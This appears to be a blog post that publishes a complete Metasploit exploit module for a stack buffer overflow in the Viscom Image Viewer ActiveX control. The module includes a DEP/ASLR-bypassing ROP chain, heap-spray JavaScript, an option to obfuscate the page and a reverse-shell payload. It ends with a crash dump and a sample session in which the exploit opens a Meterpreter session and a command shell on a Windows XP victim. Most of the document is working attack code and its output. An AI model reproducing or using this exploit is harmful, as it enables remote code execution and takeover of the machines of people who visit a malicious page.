read, write, eXecute…

Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control Stack Buffer Overflow Vulnerability download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
                        'Description'    => %q{
                                        This module exploits a stack based buffer overflow in the Active control file
                                ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
                                method. Exploitation results in code execution with the privileges of the user who
                                browsed to the exploit page.

                                The victim will first be required to trust the publisher Viscom Software.
                                This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
                                with Java support.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'Dr_IDE', # Vulnerability discovery and original exploit
                                        'TecR0c', # Metasploit module
                                        'mr_me'   # Metasploit module
                                ],
                        'Version'        => '$Revision: $',
                        'References'     =>
                                [
                                        [ 'URL', 'http://www.exploit-db.com/exploits/15668/' ],
                                        [ 'URL', 'http://secunia.com/advisories/42445/' ],
                                        [ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        'DisablePayloadHandler' => 'false',
                                        'InitialAutoRunScript' => 'migrate -f'
                                },
                        'Payload'        =>
                                {
                                        'Space'         => 1024,
                                        'BadChars'      => "\x00"
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', {} ],
                                        [ 'Windows XP IE6-7', {} ],
                                        [ 'Windows XP IE8, Windows Vista & Windows 7 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
                                ],
                        'DisclosureDate' => 'Mar 03 2010',
                        'DefaultTarget'  => 0))

                register_options(
                        [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
        end

        # Prevent module from being executed in autopwn
        def autofilter
                false
        end

        def check_dependencies
                use_zlib
        end

        def junk(n=4)
                return rand_text_alpha(n).unpack("L")[0].to_i
        end

        def on_request_uri(cli, request)

                # Set target manually or automatically
                my_target = target
                if my_target.name == 'Automatic'
                        agent = request.headers['User-Agent']
                        if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
                                my_target = targets[1] # XP
                        elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
                                my_target = targets[1] # XP
                        elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
                                my_target = targets[2] # XP
                        elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
                                my_target = targets[2] # Vista
                        elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
                                my_target = targets[2] # Vista
                        elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
                                my_target = targets[2] # Win7
                        end
                end

                sploit = rand_text_alpha(52)
                pivot = [0x12AE0FE4].pack("V") # Address to my code

                if my_target.name =~ /IE8/

                        code =
                        [ # MSVCR71.dll - rop chain generated with mona.py
                                0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
                                0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
                                0x7C347F98, # RETN (ROP NOP)
                                0x7C3415A2, # JMP [EAX]
                                0xFFFFFFFF, #
                                0x7C376402, # Skip 4 bytes
                                0x7C351E05, # NEG EAX # RETN
                                0x7C345255, # INC EBX # FPATAN # RETN
                                0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
                                0x7C344F87, # POP EDX # RETN
                                0xFFFFFFC0, # Value to negate, will become 0x00000040
                                0x7C351EB1, # NEG EDX # RETN
                                0x7C34D201, # POP ECX # RETN
                                0x7C38B001, # &Writable location
                                0x7C347F97, # POP EAX # RETN
                                0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
                                0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
                                0x7C345C30, # Ptr to 'push esp # ret
                        ].pack("V*")

                        code << payload.encoded
                        sploit << [0x100EAD78].pack("V") # POP ESP # RETN [IMAGEV~1.OCX]

                else
                        code = payload.encoded
                        sploit << pivot
                end

                # Payload in JS format
                code = Rex::Text.to_unescape(code)

                sploit << [0x41414141].pack("V") # Filler
                sploit << [0x42424242].pack("V") # Filler
                sploit << [0x43434343].pack("V") # Filler
                sploit << pivot

                # Randomize the javascript variable names
                vname = rand_text_alpha(rand(100) + 1)

                spray = <<-JS
                var heap_lib = new heapLib.ie(0x20000);
                var code = unescape("#{code}");
                var nops = unescape("%u0c0c%u0c0c");

                while (nops.length < 0x2000) nops += nops;
                var offset = nops.substring(0, 0x800-0x20);
                var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);

                while (shellcode.length < 0x40000) shellcode += shellcode;
                var block = shellcode.substring(0, (0x7fb00-6)/2);

                heap_lib.gc();

                for (var i = 0; i < 0x200; i++) {
                heap_lib.alloc(block);
                }

                var overflow = unescape("#{sploit}");
                var variable1 = "VARIABLE";

                #{vname}.TIFMergeMultiFiles(variable1,variable1,overflow);
                JS

                # Use heaplib
                js = heaplib(spray)

                # Obfuscate on demand
                if datastore['OBFUSCATE']
                        js = ::Rex::Exploitation::JSObfu.new(js)
                        js.obfuscate
                end

                html = "<html>"
                html << "\n<object classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E' id='#{vname}'></object>"
                html << "\n\t<script>#{js}\n\t</script>\n</html>"

                print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

                # Transmit the response to the client
                send_response_html(cli, html)

        end

end
=begin
(460.1d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000fffd ebx=00000000 ecx=41414141 edx=6c440088 esi=00000010 edi=0204f5a8
eip=42424242 esp=0204f5b8 ebp=0204f644 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???

0:005> dd @esp
0203f594  41414141 41414141 41414141 41414141
0203f5a4  41414141 41414141 41414141 41414141
=end
example usage
tec@blabla:/opt/framework-3.7.1/msf3/modules/exploits/windows/browser# msfconsole -r imageviewer.rc


Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 854 exploits - 404 auxiliary - 117 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14259 updated today (2011.11.14)

[*] Processing imageviewer.rc for ERB directives.
resource (imageviewer.rc)> use exploit/windows/browser/imageviewer_tifmergemultifiles
resource (imageviewer.rc)> set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1
resource (imageviewer.rc)> set URIPATH /exploit
URIPATH => /exploit
resource (imageviewer.rc)> exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.133.122:4444
[*] Using URL: http://192.168.188.1:8080/exploit
[*] Server started.
msf  exploit(imageviewer_tifmergemultifiles) >
[*] Sending Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control to 192.168.188.131:1086...
[*] Sending stage (752128 bytes) to 192.168.133.122
[*] Meterpreter session 1 opened (192.168.133.122:4444 -> 192.168.133.122:48750) at 2011-11-14 20:42:43 +1100
[*] Session ID 1 (192.168.133.122:4444 -> 192.168.133.122:48750) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (312)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 164
[+] Successfully migrated to process

msf  exploit(imageviewer_tifmergemultifiles) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1176 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>